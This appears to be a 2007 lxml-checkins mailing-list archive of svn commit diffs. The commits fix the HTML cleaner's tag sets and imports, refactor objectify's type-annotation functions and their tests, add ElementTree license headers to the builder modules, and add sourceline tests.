- kill_tags.union(('applet', 'param')) + kill_tags.update(('applet', 'param')) # The alternate contents that are in an iframe are a good fallback: # FIXME: somehow embed seems to be getting data, but from what I # can tell the embed tag is supposed to always be empty - remove_tags.union(('iframe', 'object', 'embed', 'layer')) + remove_tags.update(('iframe', 'object', 'embed', 'layer')) if frames: - kill_tags.union(defs.frame_tags) + kill_tags.update(defs.frame_tags) if forms: remove_tags.add('form') - kill_tags.union(('button', 'input', 'select', 'textarea')) + kill_tags.update(('button', 'input', 'select', 'textarea')) if annoying_tags: - remove_tags.union(('blink', 'marque')) + remove_tags.update(('blink', 'marque')) _remove = [] if strip_tags: From scoder at codespeak.net Thu Jun 21 21:22:23 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Thu, 21 Jun 2007 21:22:23 +0200 (CEST) Subject: [Lxml-checkins] r44411 - lxml/branch/html/src/lxml/html/tests Message-ID: <20070621192223.0C19D80C9@code0.codespeak.net> Author: scoder Date: Thu Jun 21 21:22:23 2007 New Revision: 44411 Modified: lxml/branch/html/src/lxml/html/tests/test_clean.txt Log: readability Modified: lxml/branch/html/src/lxml/html/tests/test_clean.txt ============================================================================== --- lxml/branch/html/src/lxml/html/tests/test_clean.txt (original) +++ lxml/branch/html/src/lxml/html/tests/test_clean.txt Thu Jun 21 21:22:23 2007 @@ -1,6 +1,7 @@ >>> from lxml.html import parse, tostring >>> from lxml.html.clean import clean, clean_html >>> from lxml.html import usedoctest + >>> doc = ''' ... ... @@ -26,6 +27,7 @@ ... ... ... ''' + >>> print doc @@ -52,6 +54,7 @@ + >>> print tostring(parse(doc)) @@ -78,6 +81,7 @@ + >>> print clean_html(doc, page_structure=False, safe_attrs_only=False) @@ -95,6 +99,7 @@ + >>> print clean_html(doc, style=True, links=True, add_nofollow=True, ... 
page_structure=False, safe_attrs_only=False) From scoder at codespeak.net Fri Jun 22 09:40:08 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Fri, 22 Jun 2007 09:40:08 +0200 (CEST) Subject: [Lxml-checkins] r44413 - in lxml/trunk/src/lxml: . tests Message-ID: <20070622074008.7D16B80B9@code0.codespeak.net> Author: scoder Date: Fri Jun 22 09:40:07 2007 New Revision: 44413 Modified: lxml/trunk/src/lxml/objectify.pyx lxml/trunk/src/lxml/tests/test_objectify.py Log: single function for annotate() and xsiannotate() Modified: lxml/trunk/src/lxml/objectify.pyx ============================================================================== --- lxml/trunk/src/lxml/objectify.pyx (original) +++ lxml/trunk/src/lxml/objectify.pyx Fri Jun 22 09:40:07 2007 @@ -1455,8 +1455,6 @@ # Type annotations cdef PyType _check_type(tree.xmlNode* c_node, PyType pytype): - # StrType does not have a typecheck but is the default anyway, - # so just accept it if given as type information if pytype is None: return None value = textOf(c_node) @@ -1468,34 +1466,114 @@ pass return None -def annotate(element_or_tree, ignore_old=True): +def annotate(element_or_tree, ignore_old=True, ignore_xsi=False, + empty_pytype=None): """Recursively annotates the elements of an XML tree with 'pytype' attributes. If the 'ignore_old' keyword argument is True (the default), current 'pytype' attributes will be ignored and replaced. Otherwise, they will be checked and only replaced if they no longer fit the current text value. + + Setting the keyword argument ``ignore_xsi`` to True makes the function + additionally ignore existing ``xsi:type`` annotations. The default is to + use them as a type hint. + + The default annotation of empty elements can be set with the + ``empty_pytype`` keyword argument. The default is not to annotate empty + elements. Pass 'str', for example, to make string values the default. 
+ """ + cdef _Element element + element = cetree.rootNodeOrRaise(element_or_tree) + _annotate(element, 0, 1, bool(ignore_xsi), bool(ignore_old), + None, empty_pytype) + +def xsiannotate(element_or_tree, ignore_old=True, ignore_pytype=False, + empty_type=None): + """Recursively annotates the elements of an XML tree with 'xsi:type' + attributes. + + If the 'ignore_old' keyword argument is True (the default), current + 'xsi:type' attributes will be ignored and replaced. Otherwise, they will be + checked and only replaced if they no longer fit the current text value. + + Note that the mapping from Python types to XSI types is usually ambiguous. + Currently, only the first XSI type name in the corresponding PyType + definition will be used for annotation. Thus, you should consider naming + the widest type first if you define additional types. + + Setting the keyword argument ``ignore_pytype`` to True makes the function + additionally ignore existing ``pytype`` annotations. The default is to + use them as a type hint. + + The default annotation of empty elements can be set with the + ``empty_type`` keyword argument. The default is not to annotate empty + elements. Pass 'string', for example, to make string values the default. 
""" cdef _Element element + element = cetree.rootNodeOrRaise(element_or_tree) + _annotate(element, 1, 0, bool(ignore_old), bool(ignore_pytype), + empty_type, None) + +cdef _annotate(_Element element, int annotate_xsi, int annotate_pytype, + int ignore_xsi, int ignore_pytype, + empty_type_name, empty_pytype_name): cdef _Document doc - cdef int ignore cdef tree.xmlNode* c_node cdef tree.xmlNs* c_ns cdef python.PyObject* dict_result - cdef PyType pytype - element = cetree.rootNodeOrRaise(element_or_tree) + cdef PyType pytype, empty_pytype, StrType, NoneType + + if not annotate_xsi and not annotate_pytype: + return + doc = element._doc - ignore = bool(ignore_old) + + if empty_type_name is not None: + dict_result = python.PyDict_GetItem(_SCHEMA_TYPE_DICT, empty_type_name) + elif empty_pytype_name is not None: + dict_result = python.PyDict_GetItem(_PYTYPE_DICT, empty_pytype_name) + else: + dict_result = NULL + if dict_result is not NULL: + empty_pytype = dict_result + else: + empty_pytype = None StrType = _PYTYPE_DICT.get('str') NoneType = _PYTYPE_DICT.get('none') c_node = element._c_node tree.BEGIN_FOR_EACH_ELEMENT_FROM(c_node, c_node, 1) if c_node.type == tree.XML_ELEMENT_NODE: + typename = None pytype = None value = None - if not ignore: - # check that old value is valid + istree = 0 + # if element is defined as xsi:nil, represent it as None + if cetree.attributeValueFromNsName( + c_node, _XML_SCHEMA_INSTANCE_NS, "nil") == "true": + pytype = NoneType + + if pytype is None and not ignore_xsi: + # check that old xsi type value is valid + typename = cetree.attributeValueFromNsName( + c_node, _XML_SCHEMA_INSTANCE_NS, "type") + if typename is not None: + dict_result = python.PyDict_GetItem(_SCHEMA_TYPE_DICT, typename) + if dict_result is NULL and ':' in typename: + prefix, typename = typename.split(':', 1) + dict_result = python.PyDict_GetItem(_SCHEMA_TYPE_DICT, typename) + if dict_result is not NULL: + pytype = dict_result + if pytype is not StrType: + # StrType does not 
have a typecheck but is the default anyway, + # so just accept it if given as type information + pytype = _check_type(c_node, pytype) + if pytype is None: + typename = None + + if pytype is None and not ignore_pytype: + # check that old pytype value is valid old_value = cetree.attributeValueFromNsName( c_node, _PYTYPE_NAMESPACE, _PYTYPE_ATTRIBUTE_NAME) if old_value is not None and old_value != TREE_PYTYPE: @@ -1508,43 +1586,73 @@ pytype = _check_type(c_node, pytype) if pytype is None: - # if element is defined as xsi:nil, represent it as None - if cetree.attributeValueFromNsName( - c_node, _XML_SCHEMA_INSTANCE_NS, "nil") == "true": - pytype = NoneType - - if pytype is None: - # check for XML Schema type hint - value = cetree.attributeValueFromNsName( - c_node, _XML_SCHEMA_INSTANCE_NS, "type") - - if value is not None: - dict_result = python.PyDict_GetItem(_SCHEMA_TYPE_DICT, value) - if dict_result is NULL and ':' in value: - prefix, value = value.split(':', 1) - dict_result = python.PyDict_GetItem(_SCHEMA_TYPE_DICT, value) - if dict_result is not NULL: - pytype = dict_result - - if pytype is None: # try to guess type if cetree.findChildForwards(c_node, 0) is NULL: # element has no children => data class pytype = _guessPyType(textOf(c_node), StrType) + else: + istree = 1 if pytype is None: - # delete attribute if it exists - cetree.delAttributeFromNsName( - c_node, _PYTYPE_NAMESPACE, _PYTYPE_ATTRIBUTE_NAME) - else: - # update or create attribute - c_ns = cetree.findOrBuildNodeNsPrefix( - doc, c_node, _PYTYPE_NAMESPACE, 'py') - tree.xmlSetNsProp(c_node, c_ns, _PYTYPE_ATTRIBUTE_NAME, - _cstr(pytype.name)) + # use default type for empty elements + if textOf(c_node) is None: + pytype = empty_pytype + if typename is None: + typename = empty_type_name + else: + pytype = StrType + + if pytype is not None: + if typename is None: + if not istree: + if python.PyList_GET_SIZE(pytype._schema_types) > 0: + # pytype->xsi:type is a 1:n mapping + # simply take the first + typename 
= pytype._schema_types[0] + elif typename not in pytype._schema_types: + typename = pytype._schema_types[0] + + if annotate_xsi: + if typename is None or istree: + cetree.delAttributeFromNsName( + c_node, _XML_SCHEMA_INSTANCE_NS, "type") + else: + # update or create attribute + c_ns = cetree.findOrBuildNodeNsPrefix( + doc, c_node, _XML_SCHEMA_NS, 'xsd') + if c_ns is not NULL: + if ':' in typename: + prefix, name = typename.split(':', 1) + if c_ns.prefix is NULL or c_ns.prefix[0] == c'\0': + typename = name + elif cstd.strcmp(_cstr(prefix), c_ns.prefix) != 0: + prefix = c_ns.prefix + typename = prefix + ':' + name + elif c_ns.prefix is not NULL or c_ns.prefix[0] != c'\0': + prefix = c_ns.prefix + typename = prefix + ':' + typename + c_ns = cetree.findOrBuildNodeNsPrefix( + doc, c_node, _XML_SCHEMA_INSTANCE_NS, 'xsi') + tree.xmlSetNsProp(c_node, c_ns, "type", _cstr(typename)) + + if annotate_pytype: + if pytype is None: + # delete attribute if it exists + cetree.delAttributeFromNsName( + c_node, _PYTYPE_NAMESPACE, _PYTYPE_ATTRIBUTE_NAME) + else: + # update or create attribute + c_ns = cetree.findOrBuildNodeNsPrefix( + doc, c_node, _PYTYPE_NAMESPACE, 'py') + tree.xmlSetNsProp(c_node, c_ns, _PYTYPE_ATTRIBUTE_NAME, + _cstr(pytype.name)) + if pytype is NoneType: + c_ns = cetree.findOrBuildNodeNsPrefix( + doc, c_node, _XML_SCHEMA_INSTANCE_NS, 'xsi') + tree.xmlSetNsProp(c_node, c_ns, "nil", "true") tree.END_FOR_EACH_ELEMENT_FROM(c_node) -def xsiannotate(element_or_tree, ignore_old=True): +def __xsiannotate(element_or_tree, ignore_old=True): """Recursively annotates the elements of an XML tree with 'xsi:type' attributes. 
Modified: lxml/trunk/src/lxml/tests/test_objectify.py ============================================================================== --- lxml/trunk/src/lxml/tests/test_objectify.py (original) +++ lxml/trunk/src/lxml/tests/test_objectify.py Fri Jun 22 09:40:07 2007 @@ -555,6 +555,26 @@ self.assertEquals("true", root.n.get(XML_SCHEMA_NIL_ATTR)) + def test_pytype_annotation_empty(self): + XML = self.XML + root = XML(u'''\ + + + + ''') + objectify.annotate(root) + + child_types = [ c.get(objectify.PYTYPE_ATTRIBUTE) + for c in root.iterchildren() ] + self.assertEquals(None, child_types[0]) + + objectify.annotate(root, empty_pytype="str") + + child_types = [ c.get(objectify.PYTYPE_ATTRIBUTE) + for c in root.iterchildren() ] + self.assertEquals("str", child_types[0]) + def test_pytype_annotation_use_old(self): XML = self.XML root = XML(u'''\ From scoder at codespeak.net Fri Jun 22 09:42:33 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Fri, 22 Jun 2007 09:42:33 +0200 (CEST) Subject: [Lxml-checkins] r44414 - in lxml/trunk/src/lxml: . 
tests Message-ID: <20070622074233.8755680CB@code0.codespeak.net> Author: scoder Date: Fri Jun 22 09:42:33 2007 New Revision: 44414 Modified: lxml/trunk/src/lxml/objectify.pyx lxml/trunk/src/lxml/tests/test_objectify.py Log: swapped xsi annotations for double and float types: prefer double Modified: lxml/trunk/src/lxml/objectify.pyx ============================================================================== --- lxml/trunk/src/lxml/objectify.pyx (original) +++ lxml/trunk/src/lxml/objectify.pyx Fri Jun 22 09:42:33 2007 @@ -903,7 +903,7 @@ pytype.register() pytype = PyType('float', float, FloatElement) - pytype.xmlSchemaTypes = ("float", "double") + pytype.xmlSchemaTypes = ("double", "float") pytype.register() pytype = PyType('bool', __checkBool, BoolElement) Modified: lxml/trunk/src/lxml/tests/test_objectify.py ============================================================================== --- lxml/trunk/src/lxml/tests/test_objectify.py (original) +++ lxml/trunk/src/lxml/tests/test_objectify.py Fri Jun 22 09:42:33 2007 @@ -599,19 +599,19 @@ child_types = [ c.get(objectify.PYTYPE_ATTRIBUTE) for c in root.iterchildren() ] - self.assertEquals("int", child_types[0]) - self.assertEquals("str", child_types[1]) - self.assertEquals("float", child_types[2]) - self.assertEquals("str", child_types[3]) - self.assertEquals("bool", child_types[4]) - self.assertEquals("none", child_types[5]) - self.assertEquals(None, child_types[6]) - self.assertEquals("float", child_types[7]) - self.assertEquals("float", child_types[8]) - self.assertEquals("str", child_types[9]) - self.assertEquals("str", child_types[10]) + self.assertEquals("int", child_types[ 0]) + self.assertEquals("str", child_types[ 1]) + self.assertEquals("float", child_types[ 2]) + self.assertEquals("str", child_types[ 3]) + self.assertEquals("bool", child_types[ 4]) + self.assertEquals("none", child_types[ 5]) + self.assertEquals(None, child_types[ 6]) + self.assertEquals("float", child_types[ 7]) + 
self.assertEquals("float", child_types[ 8]) + self.assertEquals("str", child_types[ 9]) + self.assertEquals("str", child_types[10]) self.assertEquals("float", child_types[11]) - self.assertEquals("long", child_types[12]) + self.assertEquals("long", child_types[12]) self.assertEquals("true", root.n.get(XML_SCHEMA_NIL_ATTR)) @@ -639,18 +639,18 @@ child_types = [ c.get(XML_SCHEMA_INSTANCE_TYPE_ATTR) for c in root.iterchildren() ] - self.assertEquals("xsd:int", child_types[0]) - self.assertEquals("xsd:string", child_types[1]) - self.assertEquals("xsd:float", child_types[2]) - self.assertEquals("xsd:string", child_types[3]) - self.assertEquals("xsd:boolean", child_types[4]) - self.assertEquals(None, child_types[5]) - self.assertEquals(None, child_types[6]) - self.assertEquals("xsd:int", child_types[7]) - self.assertEquals("xsd:int", child_types[8]) - self.assertEquals("xsd:int", child_types[9]) + self.assertEquals("xsd:int", child_types[ 0]) + self.assertEquals("xsd:string", child_types[ 1]) + self.assertEquals("xsd:double", child_types[ 2]) + self.assertEquals("xsd:string", child_types[ 3]) + self.assertEquals("xsd:boolean", child_types[ 4]) + self.assertEquals(None, child_types[ 5]) + self.assertEquals(None, child_types[ 6]) + self.assertEquals("xsd:int", child_types[ 7]) + self.assertEquals("xsd:int", child_types[ 8]) + self.assertEquals("xsd:int", child_types[ 9]) self.assertEquals("xsd:string", child_types[10]) - self.assertEquals("xsd:float", child_types[11]) + self.assertEquals("xsd:double", child_types[11]) self.assertEquals("xsd:integer", child_types[12]) self.assertEquals("true", root.n.get(XML_SCHEMA_NIL_ATTR)) @@ -679,18 +679,18 @@ child_types = [ c.get(XML_SCHEMA_INSTANCE_TYPE_ATTR) for c in root.iterchildren() ] - self.assertEquals("xsd:int", child_types[0]) - self.assertEquals("xsd:string", child_types[1]) - self.assertEquals("xsd:float", child_types[2]) - self.assertEquals("xsd:string", child_types[3]) - self.assertEquals("xsd:boolean", child_types[4]) - 
self.assertEquals(None, child_types[5]) - self.assertEquals(None, child_types[6]) - self.assertEquals("xsd:double", child_types[7]) - self.assertEquals("xsd:float", child_types[8]) - self.assertEquals("xsd:string", child_types[9]) + self.assertEquals("xsd:int", child_types[ 0]) + self.assertEquals("xsd:string", child_types[ 1]) + self.assertEquals("xsd:double", child_types[ 2]) + self.assertEquals("xsd:string", child_types[ 3]) + self.assertEquals("xsd:boolean", child_types[ 4]) + self.assertEquals(None, child_types[ 5]) + self.assertEquals(None, child_types[ 6]) + self.assertEquals("xsd:double", child_types[ 7]) + self.assertEquals("xsd:float", child_types[ 8]) + self.assertEquals("xsd:string", child_types[ 9]) self.assertEquals("xsd:string", child_types[10]) - self.assertEquals("xsd:float", child_types[11]) + self.assertEquals("xsd:double", child_types[11]) self.assertEquals("xsd:integer", child_types[12]) self.assertEquals("true", root.n.get(XML_SCHEMA_NIL_ATTR)) @@ -750,7 +750,7 @@ for c in root.iterchildren() ] self.assertEquals("xsd:int", child_types[ 0]) self.assertEquals("xsd:string", child_types[ 1]) - self.assertEquals("xsd:float", child_types[ 2]) + self.assertEquals("xsd:double", child_types[ 2]) self.assertEquals("xsd:string", child_types[ 3]) self.assertEquals("xsd:boolean", child_types[ 4]) self.assertEquals(None, child_types[ 5]) @@ -759,7 +759,7 @@ self.assertEquals("xsd:int", child_types[ 8]) self.assertEquals("xsd:int", child_types[ 9]) self.assertEquals("xsd:string", child_types[10]) - self.assertEquals("xsd:float", child_types[11]) + self.assertEquals("xsd:double", child_types[11]) self.assertEquals("xsd:integer", child_types[12]) self.assertEquals("true", root.n.get(XML_SCHEMA_NIL_ATTR)) From scoder at codespeak.net Fri Jun 22 10:13:16 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Fri, 22 Jun 2007 10:13:16 +0200 (CEST) Subject: [Lxml-checkins] r44415 - lxml/branch/html/src/lxml/html Message-ID: 
<20070622081316.EA7D180CB@code0.codespeak.net> Author: scoder Date: Fri Jun 22 10:13:16 2007 New Revision: 44415 Modified: lxml/branch/html/src/lxml/html/clean.py Log: import fix Modified: lxml/branch/html/src/lxml/html/clean.py ============================================================================== --- lxml/branch/html/src/lxml/html/clean.py (original) +++ lxml/branch/html/src/lxml/html/clean.py Fri Jun 22 10:13:16 2007 @@ -4,7 +4,7 @@ from lxml.html import parse, tostring try: - import set + set except ImportError: from sets import Set as set From scoder at codespeak.net Fri Jun 22 11:55:41 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Fri, 22 Jun 2007 11:55:41 +0200 (CEST) Subject: [Lxml-checkins] r44422 - lxml/branch/html/src/lxml/html Message-ID: <20070622095541.1A50080F0@code0.codespeak.net> Author: scoder Date: Fri Jun 22 11:55:40 2007 New Revision: 44422 Modified: lxml/branch/html/src/lxml/html/clean.py Log: import fix Modified: lxml/branch/html/src/lxml/html/clean.py ============================================================================== --- lxml/branch/html/src/lxml/html/clean.py (original) +++ lxml/branch/html/src/lxml/html/clean.py Fri Jun 22 11:55:40 2007 @@ -5,7 +5,7 @@ try: set -except ImportError: +except NameError: from sets import Set as set __all__ = ['clean_html', 'clean', 'autolink', 'autolink_html', From scoder at codespeak.net Fri Jun 22 14:13:43 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Fri, 22 Jun 2007 14:13:43 +0200 (CEST) Subject: [Lxml-checkins] r44427 - lxml/branch/lxml-1.3/src/lxml Message-ID: <20070622121343.0954B80F1@code0.codespeak.net> Author: scoder Date: Fri Jun 22 14:13:42 2007 New Revision: 44427 Added: lxml/branch/lxml-1.3/src/lxml/builder.py - copied unchanged from r44426, lxml/trunk/src/lxml/builder.py Log: re-integrated FL's E-Factory into lxml 1.3 From scoder at codespeak.net Fri Jun 22 14:13:51 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: 
Fri, 22 Jun 2007 14:13:51 +0200 (CEST) Subject: [Lxml-checkins] r44428 - lxml/branch/lxml-1.3/src/lxml Message-ID: <20070622121351.5A6D280F6@code0.codespeak.net> Author: scoder Date: Fri Jun 22 14:13:50 2007 New Revision: 44428 Added: lxml/branch/lxml-1.3/src/lxml/htmlbuilder.py - copied unchanged from r44427, lxml/trunk/src/lxml/htmlbuilder.py Log: re-integrated FL's E-Factory into lxml 1.3 From scoder at codespeak.net Fri Jun 22 14:39:59 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Fri, 22 Jun 2007 14:39:59 +0200 (CEST) Subject: [Lxml-checkins] r44429 - lxml/trunk/src/lxml Message-ID: <20070622123959.5C0D680E9@code0.codespeak.net> Author: scoder Date: Fri Jun 22 14:39:57 2007 New Revision: 44429 Modified: lxml/trunk/src/lxml/builder.py lxml/trunk/src/lxml/htmlbuilder.py Log: builder license Modified: lxml/trunk/src/lxml/builder.py ============================================================================== --- lxml/trunk/src/lxml/builder.py (original) +++ lxml/trunk/src/lxml/builder.py Fri Jun 22 14:39:57 2007 @@ -1,10 +1,37 @@ -""" -Element generator factory by Fredrik Lundh. - -Source: - http://online.effbot.org/2006_11_01_archive.htm#et-builder - http://effbot.python-hosting.com/file/stuff/sandbox/elementlib/builder.py -""" +# +# Element generator factory by Fredrik Lundh. 
+# +# Source: +# http://online.effbot.org/2006_11_01_archive.htm#et-builder +# http://effbot.python-hosting.com/file/stuff/sandbox/elementlib/builder.py +# +# -------------------------------------------------------------------- +# The ElementTree toolkit is +# +# Copyright (c) 1999-2004 by Fredrik Lundh +# +# By obtaining, using, and/or copying this software and/or its +# associated documentation, you agree that you have read, understood, +# and will comply with the following terms and conditions: +# +# Permission to use, copy, modify, and distribute this software and +# its associated documentation for any purpose and without fee is +# hereby granted, provided that the above copyright notice appears in +# all copies, and that both that copyright notice and this permission +# notice appear in supporting documentation, and that the name of +# Secret Labs AB or the author not be used in advertising or publicity +# pertaining to distribution of the software without specific, written +# prior permission. +# +# SECRET LABS AB AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH REGARD +# TO THIS SOFTWARE, INCLUDING ALL IMPLIED WARRANTIES OF MERCHANT- +# ABILITY AND FITNESS. IN NO EVENT SHALL SECRET LABS AB OR THE AUTHOR +# BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR ANY +# DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, +# WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS +# ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE +# OF THIS SOFTWARE. 
+# -------------------------------------------------------------------- import etree as ET Modified: lxml/trunk/src/lxml/htmlbuilder.py ============================================================================== --- lxml/trunk/src/lxml/htmlbuilder.py (original) +++ lxml/trunk/src/lxml/htmlbuilder.py Fri Jun 22 14:39:57 2007 @@ -1,6 +1,35 @@ -""" -HTML specialisation of ``builder.py`` by Fredrik Lundh +# +# HTML specialisation of ``builder.py`` by Fredrik Lundh +# +# -------------------------------------------------------------------- +# The ElementTree toolkit is +# +# Copyright (c) 1999-2004 by Fredrik Lundh +# +# By obtaining, using, and/or copying this software and/or its +# associated documentation, you agree that you have read, understood, +# and will comply with the following terms and conditions: +# +# Permission to use, copy, modify, and distribute this software and +# its associated documentation for any purpose and without fee is +# hereby granted, provided that the above copyright notice appears in +# all copies, and that both that copyright notice and this permission +# notice appear in supporting documentation, and that the name of +# Secret Labs AB or the author not be used in advertising or publicity +# pertaining to distribution of the software without specific, written +# prior permission. +# +# SECRET LABS AB AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH REGARD +# TO THIS SOFTWARE, INCLUDING ALL IMPLIED WARRANTIES OF MERCHANT- +# ABILITY AND FITNESS. IN NO EVENT SHALL SECRET LABS AB OR THE AUTHOR +# BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR ANY +# DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, +# WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS +# ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE +# OF THIS SOFTWARE. 
+# -------------------------------------------------------------------- +""" Usage:: >>> from lxml.htmlbuilder import * From scoder at codespeak.net Fri Jun 22 14:40:14 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Fri, 22 Jun 2007 14:40:14 +0200 (CEST) Subject: [Lxml-checkins] r44430 - lxml/branch/lxml-1.3/src/lxml Message-ID: <20070622124014.EFF8C80EF@code0.codespeak.net> Author: scoder Date: Fri Jun 22 14:40:14 2007 New Revision: 44430 Modified: lxml/branch/lxml-1.3/src/lxml/builder.py lxml/branch/lxml-1.3/src/lxml/htmlbuilder.py Log: builder license Modified: lxml/branch/lxml-1.3/src/lxml/builder.py ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/builder.py (original) +++ lxml/branch/lxml-1.3/src/lxml/builder.py Fri Jun 22 14:40:14 2007 @@ -1,10 +1,37 @@ -""" -Element generator factory by Fredrik Lundh. - -Source: - http://online.effbot.org/2006_11_01_archive.htm#et-builder - http://effbot.python-hosting.com/file/stuff/sandbox/elementlib/builder.py -""" +# +# Element generator factory by Fredrik Lundh. 
+# +# Source: +# http://online.effbot.org/2006_11_01_archive.htm#et-builder +# http://effbot.python-hosting.com/file/stuff/sandbox/elementlib/builder.py +# +# -------------------------------------------------------------------- +# The ElementTree toolkit is +# +# Copyright (c) 1999-2004 by Fredrik Lundh +# +# By obtaining, using, and/or copying this software and/or its +# associated documentation, you agree that you have read, understood, +# and will comply with the following terms and conditions: +# +# Permission to use, copy, modify, and distribute this software and +# its associated documentation for any purpose and without fee is +# hereby granted, provided that the above copyright notice appears in +# all copies, and that both that copyright notice and this permission +# notice appear in supporting documentation, and that the name of +# Secret Labs AB or the author not be used in advertising or publicity +# pertaining to distribution of the software without specific, written +# prior permission. +# +# SECRET LABS AB AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH REGARD +# TO THIS SOFTWARE, INCLUDING ALL IMPLIED WARRANTIES OF MERCHANT- +# ABILITY AND FITNESS. IN NO EVENT SHALL SECRET LABS AB OR THE AUTHOR +# BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR ANY +# DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, +# WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS +# ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE +# OF THIS SOFTWARE. 
+# -------------------------------------------------------------------- import etree as ET Modified: lxml/branch/lxml-1.3/src/lxml/htmlbuilder.py ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/htmlbuilder.py (original) +++ lxml/branch/lxml-1.3/src/lxml/htmlbuilder.py Fri Jun 22 14:40:14 2007 @@ -1,6 +1,35 @@ -""" -HTML specialisation of ``builder.py`` by Fredrik Lundh +# +# HTML specialisation of ``builder.py`` by Fredrik Lundh +# +# -------------------------------------------------------------------- +# The ElementTree toolkit is +# +# Copyright (c) 1999-2004 by Fredrik Lundh +# +# By obtaining, using, and/or copying this software and/or its +# associated documentation, you agree that you have read, understood, +# and will comply with the following terms and conditions: +# +# Permission to use, copy, modify, and distribute this software and +# its associated documentation for any purpose and without fee is +# hereby granted, provided that the above copyright notice appears in +# all copies, and that both that copyright notice and this permission +# notice appear in supporting documentation, and that the name of +# Secret Labs AB or the author not be used in advertising or publicity +# pertaining to distribution of the software without specific, written +# prior permission. +# +# SECRET LABS AB AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH REGARD +# TO THIS SOFTWARE, INCLUDING ALL IMPLIED WARRANTIES OF MERCHANT- +# ABILITY AND FITNESS. IN NO EVENT SHALL SECRET LABS AB OR THE AUTHOR +# BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR ANY +# DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, +# WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS +# ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE +# OF THIS SOFTWARE. 
+# -------------------------------------------------------------------- +""" Usage:: >>> from lxml.htmlbuilder import * From scoder at codespeak.net Fri Jun 22 19:10:40 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Fri, 22 Jun 2007 19:10:40 +0200 (CEST) Subject: [Lxml-checkins] r44433 - lxml/trunk/src/lxml/tests Message-ID: <20070622171040.AA88E8120@code0.codespeak.net> Author: scoder Date: Fri Jun 22 19:10:38 2007 New Revision: 44433 Modified: lxml/trunk/src/lxml/tests/test_etree.py Log: fix after XInclude directory change Modified: lxml/trunk/src/lxml/tests/test_etree.py ============================================================================== --- lxml/trunk/src/lxml/tests/test_etree.py (original) +++ lxml/trunk/src/lxml/tests/test_etree.py Fri Jun 22 19:10:38 2007 @@ -1398,12 +1398,33 @@ def test_sourceline_parse(self): parse = self.etree.parse - tree = parse(fileInTestDir('test_xinclude.xml')) + tree = parse(fileInTestDir('include/test_xinclude.xml')) self.assertEquals( [1, 2, 3], [ el.sourceline for el in tree.getiterator() ]) + def test_sourceline_iterparse_end(self): + iterparse = self.etree.iterparse + lines = list( + el.sourceline for (event, el) in + iterparse(fileInTestDir('include/test_xinclude.xml'))) + + self.assertEquals( + [2, 3, 1], + lines) + + def test_sourceline_iterparse_start(self): + iterparse = self.etree.iterparse + lines = list( + el.sourceline for (event, el) in + iterparse(fileInTestDir('include/test_xinclude.xml'), + events=("start",))) + + self.assertEquals( + [1, 2, 3], + lines) + def test_sourceline_element(self): Element = self.etree.Element SubElement = self.etree.SubElement From scoder at codespeak.net Fri Jun 22 19:33:41 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Fri, 22 Jun 2007 19:33:41 +0200 (CEST) Subject: [Lxml-checkins] r44434 - in lxml/trunk: . 
src/lxml src/lxml/tests Message-ID: <20070622173341.D06CF8125@code0.codespeak.net> Author: scoder Date: Fri Jun 22 19:33:41 2007 New Revision: 44434 Modified: lxml/trunk/CHANGES.txt lxml/trunk/src/lxml/apihelpers.pxi lxml/trunk/src/lxml/etree.pyx lxml/trunk/src/lxml/proxy.pxi lxml/trunk/src/lxml/tests/test_elementtree.py Log: make removed nodes ns-self-contained Modified: lxml/trunk/CHANGES.txt ============================================================================== --- lxml/trunk/CHANGES.txt (original) +++ lxml/trunk/CHANGES.txt Fri Jun 22 19:33:41 2007 @@ -52,6 +52,9 @@ Bugs fixed ---------- +* Removing Elements from a tree could make them loose their namespace + declarations + * ``ElementInclude`` didn't honour base URL of original document * Replacing the children slice of an Element would cut off the tails of the Modified: lxml/trunk/src/lxml/apihelpers.pxi ============================================================================== --- lxml/trunk/src/lxml/apihelpers.pxi (original) +++ lxml/trunk/src/lxml/apihelpers.pxi Fri Jun 22 19:33:41 2007 @@ -487,14 +487,17 @@ else: return 0 -cdef void _removeNode(xmlNode* c_node): - """Unlink and free a node and subnodes if possible. +cdef void _removeNode(_Document doc, xmlNode* c_node): + """Unlink and free a node and subnodes if possible. Otherwise, make sure + it's self-contained. 
